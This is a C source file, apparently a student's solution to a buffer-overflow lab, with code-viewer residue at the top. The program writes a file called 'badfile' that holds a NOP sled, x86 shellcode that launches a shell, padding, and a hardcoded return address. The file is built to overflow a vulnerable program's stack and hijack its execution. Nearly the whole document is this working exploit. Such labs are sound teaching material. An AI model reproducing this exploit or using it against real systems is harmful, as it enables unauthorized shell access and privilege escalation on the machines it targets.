45 lines
1.2 KiB
C
Executable file
45 lines
1.2 KiB
C
Executable file
/* exploit.c */
|
|
|
|
/* A program that creates a file containing code for launching shell*/
|
|
|
|
#include <stdlib.h>
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
char shellcode[]=
|
|
"\x31\xc0" /* xorl %eax,%eax */
|
|
"\x50" /* pushl %eax */
|
|
"\x68""/zsh" /* pushl $0x68732f2f */
|
|
"\x68""/bin" /* pushl $0x6e69622f */
|
|
"\x89\xe3" /* movl %esp,%ebx */
|
|
"\x50" /* pushl %eax */
|
|
"\x53" /* pushl %ebx */
|
|
"\x89\xe1" /* movl %esp,%ecx */
|
|
"\x99" /* cdql */
|
|
"\xb0\x0b" /* movb $0x0b,%al */
|
|
"\xcd\x80" /* int $0x80 */
|
|
;
|
|
|
|
int main(int argc, char **argv)
|
|
{
|
|
char buffer[517];
|
|
FILE *badfile;
|
|
|
|
/* Initialize buffer with 0x90 (NOP instruction) */
|
|
memset(&buffer, 0x90, 517);
|
|
|
|
/* You need to fill the buffer with appropriate contents here */
|
|
|
|
// Inject the shellcode into the buffer.
|
|
strcpy(&buffer[33], shellcode);
|
|
// Padding...
|
|
strcpy(&buffer[57], "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
|
|
// Point ebp register to the injected code.
|
|
strcpy(&buffer[16], "\xf8\xf2\xff\xbf");
|
|
|
|
/* Save the contents to the file "badfile" */
|
|
badfile = fopen("./badfile", "w");
|
|
|
|
fwrite(buffer, 517, 1, badfile);
|
|
fclose(badfile);
|
|
}
|